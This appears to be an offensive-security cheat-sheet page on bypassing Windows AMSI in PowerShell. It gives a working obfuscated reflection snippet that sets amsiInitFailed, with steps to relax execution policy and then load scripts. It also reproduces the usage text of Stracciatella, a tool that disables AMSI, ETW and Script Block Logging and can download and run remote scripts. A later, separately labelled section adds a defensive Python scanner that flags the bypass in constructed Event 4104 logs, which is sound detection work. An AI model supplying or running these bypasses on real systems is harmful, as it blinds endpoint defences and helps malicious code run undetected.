AMSI
PowerShell version
A "poor man’s" AMSI bypass for executing scripts and .NET content. This only applies to the current PowerShell session.
- Start PowerShell with a relaxed execution policy (e.g. `powershell -executionpolicy bypass powershell.exe`) or set it temporarily (e.g. `Set-ExecutionPolicy Unrestricted`).
- Apply an AMSI bypass.
- Load your scripts.
```powershell
$type = "System.Management."
$type += "Automation."
$type += "Am"
$type += "si"
$type += "Utils"
$field = "am"
$field += "si"
$field += "InitFailed"
$method = "Non"
$method += "Public"
$method += ",Static"
$util = [Ref].Assembly.GetType($type);
$failed = $util.GetField($field, $method);
$failed.SetValue($null, $true);
```

Stracciatella
PowerShell runspace from within C# (aka SharpPick technique) with AMSI, ETW, and Script Block Logging disabled.^[https://github.com/mgeeky/Stracciatella]
Stracciatella.exe (Syslifters offsec-tools)
```powershell
PS D:\> Stracciatella -h
:: Stracciatella - Powershell runspace with AMSI, ETW and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19-22 <mb@binary-offensive.com>
v0.7
Usage: stracciatella.exe [options] [command]
  -s <path>, --script <path> - Path to file containing Powershell script to execute. If not options given, will enter
                               a pseudo-shell loop. This can be also a HTTP(S) URL to download & execute powershell script.
  -v, --verbose              - Prints verbose informations
  -n, --nocleanup            - Don't remove CLM disable leftovers (DLL files in TEMP and COM registry keys).
                               By default these are going to be always removed.
  -C, --leaveclm             - Don't attempt to disable CLM. Stealthier. Will avoid leaving CLM disable artefacts undeleted.
  -f, --force                - Proceed with execution even if Powershell defenses were not disabled.
                               By default we bail out on failure.
  -c, --command              - Executes the specified commands You can either use -c or append commands after
                               stracciatella parameters: cmd> straciatella ipconfig /all
                               If command and script parameters were given, executes command after running script.
  -x <key>, --xor <key>      - Consider input as XOR encoded, where <key> is a one byte key in decimal
                               (prefix with 0x for hex)
  -p <name>, --pipe <name>   - Read powershell commands from a specified named pipe. Command must be preceded with 4 bytes of
                               its length coded in little-endian (Length-Value notation).
  -t <millisecs>, --timeout <millisecs>
                             - Specifies timeout for pipe read operation (in milliseconds). Default: 60 secs. 0 - infinite.
  -e, --cmdalsoencoded       - Consider input command (specified in '--command') encoded as well.
                               Decodes input command after decoding and running input script file.
                               By default we only decode input file and consider command given in plaintext
```
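Defender-side check, added here and not taken from the page or from the Stracciatella project: a Python scan over constructed PowerShell Script Block Logging records (Event ID 4104) that reassembles string literals built up with `=` and `+=` and flags AMSI-related identifiers that exist only after concatenation. The `amsiInitFailed` flip in the PowerShell section above switches off AMSI scanning for the session but does not touch Script Block Logging, so the 4104 record of the bypass itself is still written and is what this check reads. Stracciatella, as its description above says, disables Script Block Logging as well, so script run through it produces no such record and this check cannot see it. The event field names and both sample blocks are constructed for the example; `SENSITIVE_TOKENS` holds real AMSI-related .NET and amsi.dll names.

```python
import re

# Constructed 4104 script block text mirroring the concatenation pattern shown on this page.
SAMPLE_SCRIPT_BLOCK = r'''
$type = "System.Management."
$type += "Automation."
$type += "Am"
$type += "si"
$type += "Utils"
$field = "am"
$field += "si"
$field += "InitFailed"
$method = "Non"
$method += "Public"
$method += ",Static"
$util = [Ref].Assembly.GetType($type);
$failed = $util.GetField($field, $method);
$failed.SetValue($null, $true);
'''

# Constructed benign block that also builds a string in pieces (must not be flagged).
BENIGN_BLOCK = r'''
$path = "C:\Program Files\"
$path += "MyApp\logs"
Get-ChildItem $path
'''

# Real AMSI-related identifiers; the bypass only hides them from text matching by splitting them.
SENSITIVE_TOKENS = ("amsiutils", "amsiinitfailed", "amsiscanbuffer", "amsicontext", "amsisession")

# Matches `$name = "literal"` and `$name += 'literal'`, with an optional trailing semicolon.
ASSIGN_RE = re.compile(r'^\s*\$(\w+)\s*(\+?=)\s*(["\'])(.*?)\3\s*;?\s*$')


def reconstruct_strings(script_block: str) -> dict:
    """Follow plain string assignments and appends per variable and return the
    final concatenated value of each. Lines that are not simple string literal
    assignments are ignored (no expression evaluation is attempted)."""
    values = {}
    for line in script_block.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, op, _quote, literal = m.groups()
        if op == "=":
            values[name] = literal
        else:
            values[name] = values.get(name, "") + literal
    return values


def find_hidden_tokens(script_block: str) -> list:
    """Return (variable, reconstructed_value, token) triples for every sensitive
    token that is present in a reassembled string but absent from the raw block
    text, i.e. only visible once the pieces are joined."""
    hits = []
    lowered_block = script_block.lower()
    for name, value in reconstruct_strings(script_block).items():
        for token in SENSITIVE_TOKENS:
            if token in value.lower() and token not in lowered_block:
                hits.append((name, value, token))
    return hits


# Constructed event records using the field names a 4104 event exposes.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockId": "block-1", "ScriptBlockText": SAMPLE_SCRIPT_BLOCK},
    {"EventID": 4104, "ScriptBlockId": "block-2", "ScriptBlockText": BENIGN_BLOCK},
]


def scan_events(events: list) -> list:
    """Return the ScriptBlockIds of 4104 events whose text assembles an AMSI name from fragments."""
    return [
        e["ScriptBlockId"]
        for e in events
        if e.get("EventID") == 4104 and find_hidden_tokens(e["ScriptBlockText"])
    ]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        for name, value, token in find_hidden_tokens(event["ScriptBlockText"]):
            print(f'{event["ScriptBlockId"]}: ${name} assembles "{value}" (matches {token})')
    print("flagged:", scan_events(SAMPLE_EVENTS))
```

The comparison against the raw block text is what keeps the check focused on evasion: a script that names `AmsiUtils` in the clear is already covered by ordinary AMSI signatures, while one that only produces the name at runtime is the case text matching misses. Extending `ASSIGN_RE` to other literal forms (here-strings, `-join`, format strings) is the natural next step; the reassembly logic stays the same.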